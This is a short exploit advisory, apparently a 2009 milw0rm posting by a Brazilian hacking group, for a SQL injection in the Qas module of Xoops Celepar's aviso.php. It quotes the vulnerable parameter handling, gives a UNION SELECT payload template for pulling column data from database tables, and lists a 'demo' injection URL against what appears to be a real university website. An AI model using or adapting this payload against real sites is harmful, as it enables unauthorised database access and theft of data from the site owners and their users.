********************************************************************************************************** Xoops Celepar Module Qas Donwload of Xoops Celepar : http://www.xoops.pr.gov.br/uploads/core/xoopscelepar.tar.gz Author: s4r4d0 mail:s4r4d0@yahoo.com ********************************************************************************************************** A Sql Injection has been found on modules Quas of Xoops Celepar in file Aviso.php . Source code: } $codigo = $_POST['codigo']; } else $codigo = $_GET['codigo']; *********************************************************************************************************** Target: site.com.br/modules/qas/aviso.php?codigo= Sql Code :-1+UNION+SELECT+1,2,columnname,4,5,6,7,8+from+tablename Demo: http://www.dce.uem.br/modules/qas/aviso.php?codigo=-1+UNION+SELECT+1,2,3,4,5,6,7,8-- *********************************************************************************************************** [ Fatal Error Group Br ] [Greetz: to Elemento_pcx - m4v3rick - w4nt3d - DD3str0yer - M0nt3r - Vympel] [From Brazil] ************************************************************************************************************ # milw0rm.com [2009-07-24]